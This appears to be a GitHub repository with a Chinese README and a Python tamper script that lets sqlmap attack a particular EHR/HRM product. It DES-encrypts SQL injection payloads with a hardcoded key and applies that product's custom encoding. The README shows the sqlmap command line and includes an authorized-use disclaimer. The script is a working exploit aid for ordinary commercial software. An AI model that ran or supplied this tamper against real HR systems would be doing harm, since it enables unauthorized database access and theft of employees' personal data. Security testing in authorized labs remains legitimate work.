├── README.md
├── __init__.py
└── hrmsTamper.py


/README.md:
--------------------------------------------------------------------------------
 1 | # HrmsTamper
 2 | 👉适用于某EHR&amp;HRM的加解密工具，可直接用于sqlmap
 3 | 
 4 | ​	逻辑来自https://github.com/vaycore/HrmsTool
 5 | 
 6 | ​	原版是java写的，需要手动指定注入语句生成payload，太麻烦，于是写了个tamper
 7 | 
 8 | 👉不需要放到sqlmap的tamper目录，直接在此目录使用即可，如下：
 9 | 
10 | ```python
11 | sqlmap -u https://example.com/?code=1" -p "code" --tamper hrmsTamper.py
12 | ```
13 | 
14 | 👉如果目标接口的加密方式不是DES，请修改hrmsTamper.py的tamper函数，把encryptEncode改为encodeSafe即可，如下：
15 | 
16 | ```python
17 | retVal = encryptEncode(payload) #注释掉
18 | # 修改为以下：
19 | retVal = encodeSafe(payload)
20 | ```
21 | 
22 | 👉**免责声明**
23 | 
24 | 本工具仅面向**合法授权**的企业安全建设行为，例如企业内部攻防演练、漏洞验证和复测，如您需要测试本工具的可用性，请自行搭建靶机环境。
25 | 
26 | 在使用本工具进行检测时，您应确保该行为符合当地的法律法规，并且已经取得了足够的授权。**请勿对非授权目标使用。**
27 | 
28 | 如您在使用本工具的过程中存在任何非法行为，**您需自行承担相应后果**，我们将不承担任何法律及连带责任。
29 | 


--------------------------------------------------------------------------------
/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Schira4396/HrmsTamper/ffad348d5455ac71fe47c33d3b303549cdbcc86c/__init__.py


--------------------------------------------------------------------------------
/hrmsTamper.py:
--------------------------------------------------------------------------------
 1 | from pyDes import des, CBC, PAD_PKCS5
 2 | import base64
 3 | from sqlmap.lib.core.enums import PRIORITY
 4 | 
 5 | __priority__ = PRIORITY.LOW
 6 | 
 7 | 
 8 | def encrypt2(data):
 9 |     iv = bytes([1, 2, 3, 4, 5, 6, 7, 8])  # 偏移量8位
10 |     iv2 = [0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08]
11 |     # a = [1, 2, 3, 4, 5, 6, 7, 8]
12 |     # b=  "12345678"   #传这个是不行的，这个是字符串
13 | 
14 |     k = des("0" * 8, 1, b'\x01\x02\x03\x04\x05\x06\x07\x08', pad=None, padmode=PAD_PKCS5)
15 |     k.setKey("ilovethisgame")
16 |     en = k.encrypt(data.encode("UTF-8"))
17 |     result = base64.b64encode(en).decode("UTF-8")
18 |     # print(result)
19 |     return result
20 | 
21 | 
22 | def encryptEncode(paramString) -> str:
23 |     if None == paramString:
24 |         return ""
25 | 
26 |     str = encrypt2(paramString)
27 |     str = str.replace("+", "@2HJB@")
28 |     str = str.replace("%", "@2HJ5@")
29 |     str = str.replace("+", "@2HJB@")
30 |     str = str.replace(" ", "@2HJ0@")
31 |     str = str.replace("/", "@2HJF@")
32 |     str = str.replace("?", "@3HJF@")
33 |     str = str.replace("#", "@2HJ3@")
34 |     str = str.replace("&", "@2HJ6@")
35 |     str = str.replace("=", "@3HJD@")
36 |     str = str.replace("\r\n", "").replace("\n", "").replace("\r", "")
37 |     str = str.replace("@", "PAATTP")
38 |     return str
39 | 
40 | 
41 | def encodeSafe(paramString) -> str:
42 |     str1 = ""
43 |     for i in paramString:
44 |         str2 = ""
45 |         tmp = hex(ord(i))[2:]
46 |         if i > 'ÿ':
47 |             str2 += "0" * (4 - len(tmp)) + tmp
48 |             str1 = str1 + "^" + tmp
49 |         elif (i >= '0' and (i <= '/' or i >= 'A')) and ((i <= 'Z' or i >= 'a') and i <= 'z'):
50 |             str1 += i
51 |         else:
52 |             str2 += ("0" + hex(ord(i))[2:]) * (2 - len(hex(ord(i))[2:]))
53 |             str1 = str1 + "~" + tmp
54 | 
55 |     return str1
56 | 
57 | 
58 | def dependencies():
59 |     pass
60 | 
61 | 
62 | def tamper(payload, **kwargs):
63 | 
64 |     retVal = encryptEncode(payload)
65 |     return retVal
66 | 
67 | 
68 | 
69 | 


--------------------------------------------------------------------------------